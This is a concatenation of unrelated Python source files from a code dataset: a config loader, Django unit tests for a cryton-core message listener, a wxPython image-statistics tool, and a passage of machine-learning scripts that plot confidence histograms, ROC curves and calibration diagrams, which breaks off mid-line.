canvas_dir.glob(\"*\"):\n if multihash.is_valid(str(child)):\n count += 1\n print(f\"{count} canvasses found in f{canvas_dir}\", file=sys.stderr)\n\n # fingerprints database\n if config.fingerprints.use == \"sqlite3\":\n conn = sqlite3.connect(config.fingerprints.connect)\n cursor = conn.cursor()\n cursor.execute(\n dedent(\n \"\"\"\n CREATE TABLE IF NOT EXISTS prints (\n channel INTEGER NOT NULL,\n fingerprint INTEGER NOT NULL,\n repeat_num INTEGER NOT NULL DEFAULT 0,\n canvas_hash TEXT NOT NULL,\n canvas sub INTEGER NOT NULL,\n sub_idx INTEGER NOT NULL,\n len INTEGER NOT NULL,\n PRIMARY KEY (channel, fingerprint, repeat_num)\n );\n \"\"\"\n )\n )\n cursor.execute(\"SELECT count(*) from prints;\")\n count = cursor.fetchone()[0]\n cursor.execute(\"SELECT count(distinct canvas_hash) from prints;\")\n count = cursor.fetchone()[0]\n print(f\"{count} fingerprints cognized so far\", file=sys.stderr)\n\n return config\n","repo_name":"MatrixManAtYrService/gnize","sub_path":"gnize/dotdir.py","file_name":"dotdir.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22935248372","text":"from django.test import TestCase\nfrom cryton.lib.services import listener\nfrom cryton.lib.models import stage, step, plan, run, worker, event\nfrom cryton.lib.util import logger, states\nfrom mock import patch, Mock\nimport os\nimport uuid\nimport threading\nimport time\nfrom model_bakery import baker\nfrom cryton.cryton_rest_api.models import (\n CorrelationEvent\n)\nimport json\n\n\ndef run_null(*kwargs):\n return 0\n\n\nmock_exc = Mock()\nmock_exc.start.side_effect = run_null\n\ndevnull = open(os.devnull, 'w')\n\nqueue_name = uuid.uuid4().hex\n\n\n@patch('cryton.lib.util.logger.logger', logger.structlog.getLogger('cryton-debug'))\n@patch(\"sys.stdout\", devnull)\n@patch('amqpstorm.Connection', Mock())\nclass ProcessListenerTest(TestCase):\n\n @patch('cryton.lib.util.util.rabbit_connection')\n def setUp(self, mock_rabbit_connection):\n self.proce_list_obj = listener.ProcessListener(queue_name, run_null)\n channel = Mock()\n channel.start_consuming.return_value = 42\n mock_rabbit_connection.return_value = channel\n\n self.proce_list_obj._create_connection()\n\n def tearDown(self) -> None:\n self.proce_list_obj.stop()\n\n def test_start(self):\n t = threading.Thread(target=self.proce_list_obj.start)\n t.start()\n\n self.assertFalse(self.proce_list_obj._stopped.is_set())\n\n def test_create_connection(self):\n self.assertFalse(self.proce_list_obj._stopped.is_set())\n\n def test_stop(self):\n self.assertFalse(self.proce_list_obj._stopped.is_set())\n self.proce_list_obj.stop()\n self.assertTrue(self.proce_list_obj._stopped.is_set())\n\n @patch('cryton.lib.services.listener.Thread')\n def test_execute_custom_callback(self, mock_thread):\n mock_cc = Mock()\n\n self.proce_list_obj._custom_callback = mock_cc\n self.proce_list_obj._execute_custom_callback(message='42')\n mock_thread.assert_called_with(target=mock_cc, args=('42',))\n\n def test_custom_callback(self):\n mock_cc = Mock()\n mock_msg = Mock()\n\n self.proce_list_obj.callback_executable = mock_cc\n self.proce_list_obj._custom_callback(mock_msg)\n mock_cc.assert_called_with(mock_msg)\n\n\n@patch('cryton.lib.util.logger.logger', logger.structlog.getLogger('cryton-debug'))\n@patch(\"sys.stdout\", devnull)\n@patch('amqpstorm.Connection', Mock())\nclass ListenerTest(TestCase):\n\n @patch('cryton.lib.services.listener.SchedulerService')\n def setUp(self, mock_ss):\n self.listener_obj = listener.Listener()\n\n @patch('cryton.lib.services.listener.Listener._create_process_for_queue', Mock())\n @patch('time.sleep')\n def test_start(self, mock_sleep: Mock):\n self.assertFalse(self.listener_obj._stopped.is_set())\n t = threading.Thread(target=self.listener_obj.start)\n mock_sleep.assert_not_called()\n t.start()\n called = False\n\n # wait until thread comes to time.sleep\n for i in range(10):\n try:\n mock_sleep.assert_called()\n called = True\n break\n except AssertionError:\n time.sleep(0.1)\n pass\n if not called:\n raise AssertionError(\"Expected 'sleep' to have been called.\")\n self.assertFalse(self.listener_obj._stopped.is_set())\n self.listener_obj.stop()\n self.assertTrue(self.listener_obj._stopped.is_set())\n\n @patch('cryton.lib.services.listener.Listener._create_process_for_queue', Mock())\n @patch('time.sleep')\n def test_stop(self, mock_sleep: Mock):\n t = threading.Thread(target=self.listener_obj.start)\n mock_sleep.assert_not_called()\n t.start()\n try:\n self.assertFalse(self.listener_obj._stopped.is_set())\n self.listener_obj.stop()\n self.assertTrue(self.listener_obj._stopped.is_set())\n except:\n pass\n else:\n t.join()\n\n @patch('cryton.lib.util.util.rabbit_connection', Mock())\n def test_create_process_for_queue(self):\n callback = Mock()\n self.assertEqual(len(self.listener_obj._listeners.keys()), 0)\n self.listener_obj._create_process_for_queue(queue_name, callback)\n self.assertEqual(len(self.listener_obj._listeners.keys()), 1)\n\n @patch('cryton.lib.util.util.rabbit_send_oneway_msg')\n def test_handle_paused(self, mock_send_msg):\n\n stage_ex_obj = baker.make(stage.StageExecutionModel, state='PAUSING')\n step_obj = baker.make(step.StepModel)\n\n def set_state(*args, **kwargs):\n stage_ex_obj.state = 'PAUSED'\n\n mock_send_msg.side_effect = set_state\n\n step_exec_stats = {\n 'step_model_id': step_obj.id,\n 'stage_execution': stage_ex_obj\n }\n\n step_exec_obj = step.StepExecution(**step_exec_stats)\n\n self.listener_obj.handle_paused(step_exec_obj)\n self.assertEqual(stage_ex_obj.state, 'PAUSED')\n\n def test_get_correlation_event(self):\n correlation_id = uuid.uuid4().hex\n cor_event = baker.make(CorrelationEvent, correlation_id=correlation_id)\n ret = self.listener_obj.get_correlation_event(correlation_id)\n\n self.assertEqual(ret, cor_event)\n\n @patch('cryton.lib.models.step.StepExecution.execute_successors')\n @patch('cryton.lib.models.step.StepExecution.ignore_successors')\n @patch('cryton.lib.models.step.StepExecution.postprocess')\n def test_step_resp_callback(self, mock_post: Mock,\n mock_ignore: Mock,\n mock_execute: Mock):\n correlation_id = uuid.uuid4().hex\n run_obj = baker.make(run.RunModel)\n worker_obj = baker.make(worker.WorkerModel)\n plan_ex_obj = plan.PlanExecution(plan_model_id=baker.make(plan.PlanModel).id,\n run_id=run_obj.id,\n worker_id=worker_obj.id)\n stage_execution = baker.make(stage.StageExecutionModel, plan_execution=plan_ex_obj.model)\n\n step_obj = baker.make(step.StepModel)\n step_exec_stats = {\n 'step_model_id': step_obj.id,\n 'stage_execution': stage_execution\n }\n\n step_exec_stats_obj = step.StepExecution(**step_exec_stats)\n cor_event = baker.make(CorrelationEvent,\n correlation_id=correlation_id,\n step_execution_id=step_exec_stats_obj.model.id)\n\n message = Mock()\n message.correlation_id = correlation_id\n message.body = json.dumps({'test': 1})\n\n plan_ex_obj.state = states.RUNNING\n plan_ex_obj.state = states.PAUSING\n plan_ex_obj.model.save()\n\n stage_execution.state = states.RUNNING\n stage_execution.state = states.PAUSING\n stage_execution.save()\n\n step_exec_stats_obj.state = states.RUNNING\n # step_exec_stats_obj.state = states.PAUSING\n step_exec_stats_obj.model.save()\n\n patch('cryton.lib.models.plan.PlanExecution', Mock(return_value=plan_ex_obj))\n\n c1 = CorrelationEvent.objects.get(id=cor_event.id)\n self.listener_obj.step_resp_callback(message)\n with self.assertRaises(CorrelationEvent.DoesNotExist):\n c2 = CorrelationEvent.objects.get(id=cor_event.id)\n\n mock_post.assert_called_with(json.loads(message.body))\n mock_ignore.assert_called_once()\n mock_execute.assert_not_called()\n\n plan_ex_obj.state = states.PAUSED\n plan_ex_obj.state = states.RUNNING\n plan_ex_obj.model.save()\n patch('cryton.lib.models.plan.PlanExecution', Mock(return_value=plan_ex_obj))\n baker.make(CorrelationEvent,\n correlation_id=correlation_id,\n step_execution_id=step_exec_stats_obj.model.id)\n self.listener_obj.step_resp_callback(message)\n mock_execute.assert_called_once()\n\n @patch('cryton.lib.models.event.process_control_event', Mock(return_value=42))\n @patch('cryton.lib.util.util.send_response')\n def test_control_resp_callback(self, mock_send_response: Mock):\n correlation_id = uuid.uuid4().hex\n\n baker.make(CorrelationEvent,\n correlation_id=correlation_id)\n\n message = Mock()\n message.correlation_id = correlation_id\n message.body = json.dumps({\n 'event_t': 'TYPE',\n 'event_v': 'VALUE'\n })\n self.listener_obj.control_resp_callback(message)\n\n mock_send_response.assert_called_with(message, json.dumps({\"return_value\": 42}))\n\n @patch('cryton.lib.models.event.process_control_request', Mock(return_value=42))\n @patch('cryton.lib.util.util.send_response')\n def test_control_req_callback(self, mock_send_response: Mock):\n correlation_id = uuid.uuid4().hex\n\n baker.make(CorrelationEvent,\n correlation_id=correlation_id)\n\n message = Mock()\n message.correlation_id = correlation_id\n message.body = json.dumps({'test': 1})\n\n self.listener_obj.control_req_callback(message)\n mock_send_response.assert_called_with(message, json.dumps({\"return_value\": 42}))\n\n @patch('cryton.lib.models.event.process_event')\n def test_event_callback(self, mock_process_event: Mock):\n message = Mock()\n message.body = json.dumps({\n 'event_t': 'TYPE',\n 'event_v': 'VALUE'\n })\n\n self.listener_obj.event_callback(message)\n\n mock_process_event.assert_called_with(event.Event('TYPE', 'VALUE'))\n\n @patch('cryton.lib.models.stage.StageExecution.trigger', Mock())\n def test_handle_finished(self):\n worker_obj = baker.make(worker.WorkerModel)\n plan_model_obj = plan.Plan()\n run_obj = run.Run(plan_model_id=plan_model_obj.model.id,\n workers_list=[worker_obj])\n plan_ex_obj = plan.PlanExecution(plan_execution_id=run_obj.model.plan_executions.all()[0].id)\n plan_ex_obj.state = states.RUNNING\n run_obj.state = states.RUNNING\n stage_ex_obj = stage.StageExecution(plan_execution=plan_ex_obj.model,\n stage_model=baker.make(stage.StageModel))\n stage_ex_obj.state = states.SCHEDULED\n stage_ex_obj.state = states.RUNNING\n\n step_ex_obj = step.StepExecution(stage_execution=stage_ex_obj.model,\n step_model=baker.make(step.StepModel))\n step_ex_obj.state = states.RUNNING\n step_ex_obj.state = states.FINISHED\n with self.assertLogs('cryton-debug', level='INFO') as cm:\n self.listener_obj.handle_finished(step_ex_obj)\n\n self.assertEqual(len(cm.output), 3)\n self.assertIn(\"stagexecution finished\", cm.output[0])\n self.assertIn(\"planexecution finished\", cm.output[1])\n self.assertIn(\"run finished\", cm.output[2])\n\n self.assertEqual(stage_ex_obj.state, states.FINISHED)\n self.assertEqual(plan_ex_obj.state, states.FINISHED)\n self.assertEqual(run_obj.state, states.FINISHED)\n","repo_name":"slashsec-edu/cryton-core","sub_path":"tests/unit_tests/test_listener.py","file_name":"test_listener.py","file_ext":"py","file_size_in_byte":11049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"27105482862","text":"#!/usr/local/bin/python\n\nimport wx\nfrom PIL import Image\nfrom PIL import ImageStat\nimport numpy\n\n# Global variables\n\nclass imageStat(wx.Frame):\n\tdef __init__(self, parent):\n\t\t# build a frame\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, \"Image Statistics Calculator\", size = (700, 220), style=wx.DEFAULT_FRAME_STYLE ^ wx.RESIZE_BORDER)\n\n\t\t# build a panel\n\t\tmainPanel = wx.Panel(self, wx.ID_ANY)\n\n\t\t# build a status bar =================================================================\n\t\tstatusBar = self.CreateStatusBar()\n\n\t\t# build a menu bar ===================================================================\n\t\tmenuBar = wx.MenuBar()\n\t\tself.SetMenuBar(menuBar)\n\n\t\t# build buttons for selecting files ==================================================\n\t\topenButton = wx.Button(mainPanel, id=wx.ID_ANY, label = \"Open...\", pos=(595, 5), size=(90,-1))\n\t\topenButton.Bind(wx.EVT_BUTTON, self.FileSelect)\n\n\t\t# build a text control for file display ==============================================\n\t\tself.fileDisplay = wx.TextCtrl(mainPanel, value = \"File name\", pos=(10,10), size=(580,-1))\n\t\t\n\t\t# build a text control for roi =======================================================\n\t\twx.StaticText(mainPanel, -1, \"X ROI size\", (210, 40), (70,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"Y ROI size\", (385, 40), (70,-1), wx.ALIGN_RIGHT)\n\t\tself.xroiDisplay = wx.TextCtrl(mainPanel, value = \"200\", pos=(285, 40), size = (90,-1))\n\t\tself.yroiDisplay = wx.TextCtrl(mainPanel, value = \"200\", pos=(460, 40), size = (90,-1))\n\t\t\n\n\t\t# build a text control for avg/std display ===========================================\n\t\twx.StaticText(mainPanel, -1, \"Average\", (80, 90), (70,-1), wx.ALIGN_CENTER)\n\t\twx.StaticText(mainPanel, -1, \"Std Dev\", (80, 120), (70,-1), wx.ALIGN_CENTER)\t\t\n\t\twx.StaticText(mainPanel, -1, \"All\", (150,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"B\", (260,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"Gb\", (370,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"Gr\", (480,70), (100,-1), wx.ALIGN_RIGHT)\n\t\twx.StaticText(mainPanel, -1, \"R\", (590,70), (100,-1), wx.ALIGN_RIGHT)\n\n\t\tself.avgDisplay = wx.TextCtrl(mainPanel, value = \"\", pos=(150, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayB = wx.TextCtrl(mainPanel, value = \"\", pos=(260, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayGb = wx.TextCtrl(mainPanel, value = \"\", pos=(370, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayGr = wx.TextCtrl(mainPanel, value = \"\", pos=(480, 90), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.avgDisplayR = wx.TextCtrl(mainPanel, value = \"\", pos=(590, 90), size=(100,-1), style=wx.TE_READONLY)\n\n\t\tself.stdDisplay = wx.TextCtrl(mainPanel, value = \"\", pos=(150, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayB = wx.TextCtrl(mainPanel, value = \"\", pos=(260, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayGb = wx.TextCtrl(mainPanel, value = \"\", pos=(370, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayGr = wx.TextCtrl(mainPanel, value = \"\", pos=(480, 120), size=(100,-1), style=wx.TE_READONLY)\n\t\tself.stdDisplayR = wx.TextCtrl(mainPanel, value = \"\", pos=(590, 120), size=(100,-1), style=wx.TE_READONLY)\n\n\t\t# build a text control for status display ============================================\n\t\tself.statusText = wx.TextCtrl(mainPanel, value = \"\", pos=(10, 150), size=(680,-1), style=wx.TE_READONLY)\n\n\t\t# build a button for reading in the image and processing =============================\n\t\tcalcButton = wx.Button(mainPanel, id=wx.ID_ANY, label = \"Calculate\", pos=(5, 35), size=(90,-1))\n\t\tcalcButton.Bind(wx.EVT_BUTTON, self.Calculate)\n\n\t\t# build a button for displaying image ================================================\n\t\tdispButton = wx.Button(mainPanel, id=wx.ID_ANY, label = \"Display\", pos=(105, 35), size=(90,-1))\n\t\tdispButton.Bind(wx.EVT_BUTTON, self.Display)\n\n\t# define callbacks\n\t# ========================================================================================\n\t\n\n\t# function for closing window\n\tdef CloseWindow(self, event):\n\t\tself.Destroy()\n\t\n\t# function for file selection\n\tdef FileSelect(self, event):\n\t\tfileDialog = wx.FileDialog(None, \"Select a bmp file\", \"\", \"\", \"BMP files (*.bmp)|*.bmp\", wx.FD_OPEN | wx.FD_FILE_MUST_EXIST)\n\n\t\t# user canceled file opening\n\t\tif fileDialog.ShowModal() == wx.ID_CANCEL:\n\t\t\treturn\n\t\t\t \n\t\t# otherwise, proceed loading the file chosen by the user\n\t\tself.fileName = fileDialog.GetPath()\n\t\tself.fileDisplay.Clear()\n\t\tself.fileDisplay.AppendText(self.fileName)\n\t\tself.avgDisplay.Clear()\n\t\tself.avgDisplayB.Clear()\n\t\tself.avgDisplayGb.Clear()\n\t\tself.avgDisplayGr.Clear()\n\t\tself.avgDisplayR.Clear()\n\t\tself.stdDisplay.Clear()\n\t\tself.stdDisplayB.Clear()\n\t\tself.stdDisplayGb.Clear()\n\t\tself.stdDisplayGr.Clear()\n\t\tself.stdDisplayR.Clear()\n\n\t# function for reading and calculating\n\tdef Calculate(self, event):\n\t\ttry:\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Processing...\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\t\t\n\t\t\t# try reading the file\n\t\t\tself.im = Image.open(self.fileDisplay.GetValue())\n\t\t\twidth, height = self.im.size\n\n\t\t\t# attempt to fetch x roi data\n\t\t\ttry:\n\t\t\t\tself.xroi = int(self.xroiDisplay.GetValue())\n\t\t\t\t# check for out of bounds conditions\n\t\t\t\tif self.xroi > width:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: x ROI out of bounds, max x = \" + str(width) + \", max y = \" + str(height))\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\t\t# check to make sure greater than 0\n\t\t\t\tif self.xroi < 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be greater than 0\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\t\n\t\t\t\t# check to make sure it is even\n\t\t\t\tif self.xroi % 2 == 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be even\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\n\t\t\texcept ValueError:\n\t\t\t\t#throw error\n\t\t\t\tself.statusText.SetValue(\"Error: please enter integer ROI value\")\n\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\treturn\n\t\t\t# attempt to fetch y roi data\n\t\t\ttry:\n\t\t\t\tself.yroi = int(self.yroiDisplay.GetValue())\n\t\t\t\t# check for out of bounds conditions\n\t\t\t\tif self.yroi > height:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: y ROI out of bounds, max x = \" + str(width) + \", max y = \" + str(height))\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\t\t# check to make sure greater than 0\n\t\t\t\tif self.yroi < 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be greater than 0\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\t\t# check to make sure it is even\n\t\t\t\tif self.yroi % 2 == 1:\n\t\t\t\t\t#throw error\n\t\t\t\t\tself.statusText.SetValue(\"Error: ROI values must be even\")\n\t\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\t\treturn\n\t\t\texcept ValueError:\n\t\t\t\t#throw error\n\t\t\t\tself.statusText.SetValue(\"Error: please enter integer ROI value\")\n\t\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\t\t\t\treturn\n\n\t\t\t# convert into matrices\t\t\t\n\t\t\tself.mat = numpy.array(self.im)\n\t\t\t# apply roi\n\t\t\tself.mat = self.mat[height/2 - self.yroi/2:height/2 + self.yroi/2, width/2 - self.xroi/2:width/2 + self.xroi/2, 0]\n\t\t\t# get each channel\n\t\t\tself.bmat = self.mat[0:self.yroi:2, 0:self.xroi:2]\n\t\t\tself.gbmat = self.mat[0:self.yroi:2, 1:self.xroi:2]\n\t\t\tself.grmat = self.mat[1:self.yroi:2, 0:self.xroi:2]\n\t\t\tself.rmat = self.mat[1:self.yroi:2, 1:self.xroi:2]\n\t\n\t\t\t# calculate and display mean\n\t\t\tself.avgDisplay.Clear()\n\t\t\tself.avgDisplay.AppendText(str(numpy.around(numpy.mean(self.mat), decimals=4)))\n\t\t\tself.avgDisplayB.Clear()\n\t\t\tself.avgDisplayB.AppendText(str(numpy.around(numpy.mean(self.bmat), decimals=4)))\n\t\t\tself.avgDisplayGb.Clear()\n\t\t\tself.avgDisplayGb.AppendText(str(numpy.around(numpy.mean(self.gbmat), decimals=4)))\n\t\t\tself.avgDisplayGr.Clear()\n\t\t\tself.avgDisplayGr.AppendText(str(numpy.around(numpy.mean(self.grmat), decimals=4)))\n\t\t\tself.avgDisplayR.Clear()\n\t\t\tself.avgDisplayR.AppendText(str(numpy.around(numpy.mean(self.rmat), decimals=4)))\n\n\t\t\t# calculate and display std\n\t\t\tself.stdDisplay.Clear()\n\t\t\tself.stdDisplay.AppendText(str(numpy.around(numpy.std(self.mat), decimals=4)))\n\t\t\tself.stdDisplayB.Clear()\n\t\t\tself.stdDisplayB.AppendText(str(numpy.around(numpy.std(self.bmat), decimals=4)))\n\t\t\tself.stdDisplayGb.Clear()\n\t\t\tself.stdDisplayGb.AppendText(str(numpy.around(numpy.std(self.gbmat), decimals=4)))\n\t\t\tself.stdDisplayGr.Clear()\n\t\t\tself.stdDisplayGr.AppendText(str(numpy.around(numpy.std(self.grmat), decimals=4)))\n\t\t\tself.stdDisplayR.Clear()\n\t\t\tself.stdDisplayR.AppendText(str(numpy.around(numpy.std(self.rmat), decimals=4)))\n\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Done.\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\texcept IOError:\n\t\t\t# throw error\n\t\t\tself.statusText.SetValue(\"Error: cannot read file.\")\n\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\n\t# function for displaying\n\tdef Display(self, event):\n\t\ttry:\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Processing...\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\t\t# try reading the file\n\t\t\tself.im = Image.open(self.fileDisplay.GetValue())\n\t\t\t# display image\n\t\t\tself.im.show()\n\t\t\t# update status\n\t\t\tself.statusText.SetValue(\"Done.\")\n\t\t\tself.statusText.SetForegroundColour(wx.BLACK)\n\t\texcept IOError:\n\t\t\t# throw error\n\t\t\tself.statusText.SetValue(\"Error: cannot read file.\")\n\t\t\tself.statusText.SetForegroundColour(wx.RED)\n\n\n# end class \n# ============================================================================================\n\n# below is needed for all GUIs\nif __name__== '__main__':\n\tapp = wx.App(False) # application object (inner workings) PySimpleApp\n\tframe = imageStat(parent = None) # frame object (what user sees)\n\tframe.Show() # show frame\n\tapp.MainLoop() # run main loop\t\n\n","repo_name":"OneRaynyDay/Internship-Project","sub_path":"imageStat.py","file_name":"imageStat.py","file_ext":"py","file_size_in_byte":9775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"31204074405","text":"import torch\nimport csv\nimport os\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LogisticRegressionCV\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.pipeline import make_pipeline\nfrom sklearn import metrics\nfrom scipy.stats import entropy\n\ndef plot_histograms(id_confidences, data, model, seed, id=None, corrects=None, ood_confidences=None):\n print(\"Calculating histogram metrics...\")\n # plot and save histogram\n fig = plt.figure(figsize = (20, 10))\n plt.style.use('seaborn-v0_8')\n plt.rcParams['font.size'] = '20'\n\n if corrects is not None:\n id_array = id_confidences[corrects]\n ood_array = id_confidences[np.invert(corrects)]\n id_label = \"Correct\"\n ood_label = \"Incorrect\"\n hist_path = \"histograms/corr/\"+data+\"_\"+model\n filename = '/LC_CORR_'+model+'_'+data+'_seed'+str(seed)+'.png'\n elif ood_confidences is not None:\n id_array = id_confidences\n ood_array = ood_confidences\n id_label = \"ID\"\n ood_label = \"OOD\"\n hist_path = \"histograms/ood/\"+data+\"_\"+model\n filename = '/LC_OOD_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n div_size = min(len(id_array), len(ood_array))\n if div_size == 0:\n id_array = np.append(id_array, 1.0)\n ood_array = np.append(ood_array, 0.0)\n kl_div = entropy(pk=id_array[:div_size], qk=ood_array[:div_size])\n bins = np.linspace(min(np.min(id_array), np.min(ood_array)), max(np.max(id_array), np.max(ood_array)), 200)\n \n ax1 = plt.subplot(1, 2, 1)\n # Set tick font size\n for label in (ax1.get_xticklabels() + ax1.get_yticklabels()):\n label.set_fontsize(20)\n ax1.hist([id_array, ood_array], bins, label=[id_label, ood_label], histtype='barstacked', density=True)\n ax1.legend(loc='upper right', frameon=False, prop={'size': 20})\n ax1.set_xlabel('Confidence', fontsize=20)\n ax1.set_ylabel('Density', fontsize=20)\n\n ax2 = plt.subplot(1, 2, 2)\n # Set tick font size\n for label in (ax2.get_xticklabels() + ax2.get_yticklabels()):\n label.set_fontsize(20)\n counts1, bins1 = np.histogram(id_array, bins, density=True)\n ax2.plot(bins1[:-1], counts1, label=id_label, color = 'tab:blue', linestyle=\"-\")\n counts2, bins2 = np.histogram(ood_array, bins, density=True)\n ax2.plot(bins2[:-1], counts2, label=ood_label, color = 'tab:green', linestyle=\"-\")\n lim = max(max(counts1), max(counts2))\n if np.isnan(lim) or np.isinf(lim):\n lim = 50\n ax2.set_ylim([0, lim])\n ax2.legend(frameon=False, prop={'size': 20})\n ax2.set_xlabel('Confidence', fontsize=20)\n ax2.set_ylabel('Density', fontsize=20)\n\n # save figure\n if not os.path.exists(hist_path):\n os.makedirs(hist_path)\n titlename = 'Learned Confidences - ' + data +' - Model Seed: '+str(seed)+' , KL-div: '+str(round(kl_div, 2))\n filename = hist_path + filename\n fig.suptitle(titlename, fontsize=25)\n plt.savefig(filename)\n plt.clf()\n plt.close()\n return kl_div\n\ndef plot_roc(tpr, fpr, model, data, auroc, UA_values, seed, id):\n # identify best Uncertainty-balanced accuracy and corr. threshold\n best_thresh = UA_values[0,np.argmax(UA_values[1,:])]\n best_ua = np.max(UA_values[1,:])\n # plot and save roc curces\n plt.style.use('seaborn-v0_8')\n plt.plot(fpr, tpr)\n plt.xlabel('False Positive Rate') #, fontsize=20\n #plt.xticks(fontsize=20)\n plt.ylabel('True Positive Rate') #, fontsize=20\n #plt.yticks(fontsize=20)\n roc_path = \"ROC_curves/\"+data+\"_\"+model\n if not os.path.exists(roc_path):\n os.makedirs(roc_path)\n\n titlename = 'ROC-curve Learning Confidence - '+data+' - AUROC: '+str(round(auroc, 4)) \\\n +' - UAcc: '+str(round(best_ua, 2)) +' - Thresh: '+str(round(best_thresh, 2))\n filename = roc_path+'/LC_roc_'+model+'_'+data+'_seed'+str(seed)+'_id'+str(id)+'.png'\n\n plt.title(titlename) #, fontsize=25\n plt.savefig(filename)\n plt.clf()\n\ndef calc_OODmetrics(id_array, ood_array):\n print(\"Calculating OOD detection metrics...\")\n # turn measure arrays into train/test data for Log.Reg\n values = np.concatenate((id_array, ood_array))\n labels = np.concatenate((np.zeros_like(id_array), np.ones_like(ood_array)))\n indices = np.random.permutation(values.shape[0])\n ratio = int(len(indices)*0.4)\n training_idx, test_idx = indices[ratio:], indices[:ratio]\n X_train, X_test = values[training_idx], values[test_idx]\n y_train, y_test = labels[training_idx], labels[test_idx]\n print(\"# instances for binary classifier: \")\n print(\"Train images: \", X_train.shape, \"\\tTest images: \", X_test.shape)\n print(\"Train labels: \", y_train.shape, \"\\tTest labels: \", y_test.shape)\n\n # perform linear regression on ID and OOD samples\n pipe = make_pipeline(StandardScaler(), LogisticRegressionCV(n_jobs=-1))\n lr = pipe.fit(X_train.reshape(-1, 1), y_train)\n y_pred = lr.predict_proba(X_test.reshape(-1, 1))[:, 1] # = probability of being OOD\n fpr, tpr, thresholds = metrics.roc_curve(y_test, y_pred) # implementation from sklearn library\n auroc = metrics.roc_auc_score(y_test, y_pred) # implementation from sklearn library\n UA_values = calc_UncBalAccuracy(y_test, y_pred, thresholds)\n\n return tpr, fpr, thresholds, auroc, UA_values\n\ndef calc_UncBalAccuracy(y_true, y_pred, thresholds):\n # calculate Uncertainty-balanced Accuracy for several thresholds\n uaccuracies = np.zeros_like(thresholds, dtype=float)\n for i, threshold in enumerate(thresholds):\n pred_labels = np.zeros_like(y_pred, dtype=int)\n pred_labels[np.where(y_pred >= threshold)] = 1\n tn, fp, fn, tp = metrics.confusion_matrix(y_true, pred_labels).ravel()\n unc_acc = (tp + tn)/(tp + tn + fp + fn)\n uaccuracies[i] = unc_acc\n UA_values = np.row_stack((thresholds, uaccuracies))\n return UA_values\n\ndef plot_calibration_diagram(confidences, predictions, all_labels, num_bins, model, seed, id, data):\n print(\"Calculating calibration metrics...\")\n # plot reliability diagram\n # code adapted from: https://github.com/hollance/reliability-diagrams/blob/master/reliability_diagrams.py\n bin_size = 1.0 / num_bins\n bins = np.linspace(0.0, 1.0, num_bins + 1)\n indices = np.digitize(confidences, bins, right=True)\n\n bin_accuracies = np.zeros(num_bins, dtype=float)\n bin_confidences = np.zeros(num_bins, dtype=float)\n bin_counts = np.zeros(num_bins, dtype=int)\n\n print(\"LABELS: \", all_labels)\n print(\"PREDS: \", predictions)\n \n for b in range(num_bins):\n selected = np.where(indices == b + 1)[0]\n if len(selected) > 0:\n bin_accuracies[b] = np.mean(all_labels[selected] == predictions[selected])\n bin_confidences[b] = np.mean(confidences[selected])\n bin_counts[b] = len(selected)\n\n # eliminate cases there are no confidence values in a selected bin (bin_confidence[b] = 0)\n non_zero = np.where(bin_confidences != 0)[0]\n if not len(non_zero) == 1 and non_zero[0] == 0: # if only 1st entry non-zero this would duplicate this first value\n non_zero = np.append(np.array([0]), non_zero)\n bin_accuracies = bin_accuracies[non_zero]\n bin_confidences = bin_confidences[non_zero]\n \n if len(non_zero) != num_bins:\n print(\"Deleted entries in bin_confidences: \", len(non_zero)-num_bins)\n print(\"Bin Accuracies: \", bin_accuracies)\n print(\"Bin Confidences: \", bin_confidences)\n print(\"Bin Counts before: \", bin_counts)\n bin_counts = bin_counts[non_zero]\n print(\"Bin Counts after: 